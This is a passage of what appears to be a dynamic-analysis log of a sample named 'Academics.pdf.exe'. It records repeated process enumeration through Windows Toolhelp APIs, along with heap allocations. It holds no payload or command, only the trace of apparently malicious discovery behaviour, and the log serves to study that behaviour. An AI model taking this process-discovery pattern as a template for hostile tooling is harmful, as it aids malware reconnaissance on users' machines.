pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0295.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.763] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0295.764] CloseHandle (hObject=0x294) returned 1 [0295.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0295.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0295.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0295.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0295.764] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0295.764] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0295.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0295.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0295.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0295.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0295.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0295.767] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0295.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0295.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.770] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0295.771] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.772] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0295.773] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0295.774] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0295.774] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0295.775] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.780] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0295.781] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0295.783] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0295.784] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0295.785] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0295.786] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.792] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0295.793] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0295.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0295.795] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0295.796] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0295.797] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0295.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0295.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0295.799] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0295.800] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0295.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0295.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0295.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0295.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0295.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0295.805] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0295.806] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0295.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0295.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0295.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0295.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.829] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0295.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0295.831] CloseHandle (hObject=0x294) returned 1 [0295.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0295.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0295.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0295.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0295.832] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0295.832] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0295.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0295.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0295.834] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0295.836] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0295.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0295.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0295.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0295.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0295.860] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0295.861] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0295.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0295.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0295.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0295.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0295.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, 